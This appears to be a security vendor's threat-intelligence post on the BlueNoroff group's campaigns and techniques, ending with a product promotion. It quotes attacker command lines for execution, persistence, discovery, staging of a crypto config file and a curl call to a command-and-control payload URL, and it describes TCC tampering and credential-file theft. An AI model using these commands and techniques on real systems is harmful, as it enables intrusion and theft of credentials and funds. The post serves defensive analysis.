BlueNoroff, a sub-group of the Lazarus collective dedicated to financial theft, has established a notorious reputation for high-stakes cybercrime, most notably the 2016 Bangladesh Central Bank heist, where they compromised SWIFT infrastructure to steal $81 million. Following this, they launched watering hole attacks against Polish banks before pivoting in 2017 to target cryptocurrency businesses via the SnatchCrypto campaign. Their operations evolved in 2018 to include fake software companies distributing backdoored applications, while recent years saw a focus on macOS targets in the Web3 sector through the 2023 GhostCall and GhostHire campaigns involving fake job interviews. Activity persisted into 2025 with supply chain attacks using malicious Go packages and a tactical shift to Microsoft Teams impersonation for distributing malware.
The group employs a diverse set of tactics that begins with deep reconnaissance on platforms like LinkedIn to create credible personas for spearphishing via Telegram or malicious job assessment links. They utilize a robust infrastructure of lookalike domains and modular malware developed in languages such as Rust and Go, often executing payloads via AppleScript, VBScript, or social engineering techniques like ClickFix. Persistence is achieved through methods ranging from tampering with browser extensions to creating macOS Launch Agents. Their objective is consistently supported by aggressive credential access through fake GUI prompts and extensive system discovery to facilitate large-scale financial theft.
In this post, we will examine the major historical activities of Lazarus / BlueNoroff, highlighting their evolution from banking heists to cryptocurrency targeting, and analyze the group's tactics, techniques, and procedures to understand their sophisticated financial cybercrime operations. In the end, we will show how Picus helps defend against this group.
The actor leveraged compromised accounts of legitimate entrepreneurs and startup founders to initiate contact with targets, implying they first gathered the necessary credentials to access these accounts.
BlueNoroff sourced profile images from social media and professional networking sites such as LinkedIn, Crunchbase, and X. These images were used to construct deceptive personas that mimicked real professionals.
BlueNoroff registered domains that closely resembled legitimate ones, such as support.video-meeting[.]online and swissborg[.]blog, to host malicious content and Command and Control (C2) infrastructure.
The threat actor employed hosting services, specifically Hostwinds, to establish and maintain phishing websites designed to mimic legitimate services.
The group actively developed a modular malware framework consisting of launchers, injectors, installers, and loaders. They utilized multiple programming languages, including Rust, C++, Python, Go, Swift, and Nim, to create these tools. Additionally, they created malicious packages for Go and TypeScript projects to be used in supply chain-style attacks.
The actor utilized legitimate tools such as "Calendly" to schedule fraudulent meetings.
In the "GhostCall" campaign, the actor invited victims to fake video calls on phishing sites mimicking Zoom or Microsoft Teams. These sites requested permissions to access the camera and microphone to record the victim.
BlueNoroff sent malicious links to targets via Telegram or LinkedIn. These links directed victims to fake meeting sites mimicking Zoom or to download malicious archives disguised as job assessments.
The group targeted individuals through messaging platforms. They impersonated venture capitalists on Telegram to establish trust before sending malicious payloads. Also, they used Telegram bots to deliver malicious ZIP files or GitHub links under the pretense of a technical skill assessment.
On macOS, AppleScript was a primary execution method. Scripts disguised as software updates (e.g., Zoom SDK Update.scpt) were run with the osascript command, which executes AppleScript, to download and run payloads [3]. An example usage of osascript is given below:

    osascript /example/path/to/Malicious_File.scpt
On Windows, a VBScript wrapper (init.vbs) was generated to execute PowerShell scripts covertly.
JavaScript was employed on phishing pages to handle user interactions, such as requesting camera permissions and managing the recording and uploading of video feeds to the /upload endpoint. For instance, camera permission can be requested with the navigator.mediaDevices.getUserMedia() API.
A "ClickFix" technique involved placing a malicious shell command into the clipboard for the user to paste and execute, which triggers the malicious actions [3]:

    cmd "<TRUNCATED COMMANDS>"
BlueNoroff targets cryptocurrency wallets by replacing the core component (background.js) of the Metamask extension with a tampered version to monitor transactions.
    // Malicious injection in Metamask background.js
On macOS, BlueNoroff created Launch Agents (e.g., com.applet.safari.plist) in ~/Library/LaunchAgents/ to ensure malware execution at login. Keys like RunAtLoad and KeepAlive were set to true [3].
Launch Daemons were created on macOS (e.g., com.apple.updatecheck). These were loaded using launchctl commands.
    launchctl unload <plist file>
Persistence is achieved by placing VBS scripts or shortcuts in the Windows Startup folder.
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\check.vbs
The threat actor employs various injection techniques across different malware variants. On Windows, the "peshooter" function within the RooTroy and CosmicDoor malware injects payloads into legitimate processes like notepad.exe. On macOS, the GillyInjector utilizes task injection to inject malicious payloads into other processes [3].
On macOS, a downloader script used by BlueNoroff actively bypasses Transparency, Consent, and Control (TCC) protections. It renames the user's com.apple.TCC directory and directly modifies the TCC.db database using INSERT OR REPLACE statements. This allows the malware to grant itself unauthorized permissions, such as access to Documents, Downloads, Desktop folders, and AppleEvents, without user consent [3].
To gain elevated privileges on Windows, the actor uses a UAC bypass tool based on an RPC method that relies on the 201ef99a-7fa0-444c-9399-19ba84f12a1a interface. This allows the actor to execute the initial DownTroy script and subsequent payloads with high privileges [3].
The "Bof loader" was protected using "Themida," a commercial packer, to complicate analysis.
Scripts and payloads were obfuscated to hide their contents. For example, PowerShell scripts used XOR encryption and AppleScript files included thousands of blank lines to conceal malicious code. Additionally, Base64 encoding and RC4/AES encryption were used for payloads and configurations.
Malware components disguised themselves as legitimate files. For example, binaries used names like trustd, watchdog, or Google LLC, and fake applications mimicked "Zoom" or "Microsoft Teams" with identical icons. Also, malicious plists mimicked Safari components.
"RooTroy" and "Bof Loader" unhooked ntdll.dll on Windows to bypass API hooking used by security products.
On macOS, the ZoomClutch and TeamsClutch malware display fake password prompt windows that mimic legitimate system authentication dialogs. These prompts trick victims into entering their passwords, which are then validated against the local Open Directory. Once validated, these credentials are used to execute commands with root privileges, facilitating the installation of root-level persistence mechanisms.
A script named secrets.sh, part of the SilentSiphon suite, searched for and stole files containing credentials, such as configuration files for AWS, Google Cloud, and Azure (.aws, .config/gcloud), as well as SSH keys and package manager configs.
The threat actor executed commands to gather network configuration data.
    ipconfig /all>[Output File] 2>&1
BlueNoroff utilized the ping command to discover remote systems.
    ping -n 1 [Redacted IP] > [Output File] 2>&1
A trojan used by BlueNoroff collects system information such as the computer name, OS version, time zone, and running processes, and prepares it for transmission to the C2 server every minute.
Attackers enumerate local users and administrator groups.
    cmd.exe /c "net user [Username] /domain >[Output File] 2>&1"
The threat actor searches for and collects specific files, such as cryptocurrency configuration files or policy documents [2].
    cmd.exe /c "type D:\2\Crypt[redacted]\Crypt[redacted].conf >[Output File] 2>&1"
The attackers create specific directories to stage data before exfiltration.
    cmd.exe /c "mkdir %public%\MM >%temp%\TMPF522.tmp 2>&1"
The malware utilized the cURL library to communicate with C2 servers via HTTP/HTTPS [5].
    curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da
BlueNoroff is financially motivated and has been observed stealing cryptocurrency worth millions, utilizing their cyberattack capabilities for profit.
We also strongly suggest simulating BlueNoroff Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the BlueNoroff Group:
Threat ID | Threat Name | Attack Module
--- | --- | ---
54002 | BlueNoroff Threat Group Campaign Malware Download Threat | Network Infiltration
68160 | BlueNoroff Threat Group Campaign Malware Email Threat | E-mail Infiltration
47104 | GhostHire Campaign Malware Download Threat | Network Infiltration
35520 | GhostHire Campaign Malware Email Threat | E-mail Infiltration
81005 | GillyInjector Malware Dropper Download Threat | Network Infiltration
73326 | GillyInjector Malware Dropper Email Threat | E-mail Infiltration
22312 | APT38 Threat Group Campaign Malware Dropper Download Threat | Network Infiltration
98859 | APT38 Threat Group Campaign Malware Dropper Email Threat | E-mail Infiltration
98288 | BlueNoroff Threat Group Campaign | macOS Endpoint
89564 | NukeSped Malware Campaign | macOS Endpoint
73913 | NukeSped Backdoor Malware Download Threat | Network Infiltration
45307 | NukeSped Backdoor Malware Email Threat | E-mail Infiltration
72931 | APT38 Threat Group FASTCash 2.0 Campaign | Windows Endpoint
68591 | RustBucket Trojan Download Threat | Network Infiltration
55476 | RustBucket Trojan Email Threat | E-mail Infiltration
92626 | ObjCShellz Web Shell Email Threat | E-mail Infiltration
91835 | ObjCShellz Web Shell Download Threat | Network Infiltration
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] GReAT, “Lazarus Under The Hood,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/lazarus-under-the-hood/77908/
[2] S. Park, “The BlueNoroff cryptocurrency hunt is still on,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/
[3] S. Ryu, “Crypto wasted: BlueNoroff’s ghost mirage of funding and jobs,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/
[4] S. Puzan, “BlueNoroff: new Trojan attacking macOS users,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/bluenoroff-new-macos-malware/111290/
[5] S. Park, “BlueNoroff introduces new methods bypassing MoTW,” Kaspersky. Accessed: Jan. 19, 2026. [Online]. Available: https://securelist.com/bluenoroff-methods-bypass-motw/108383/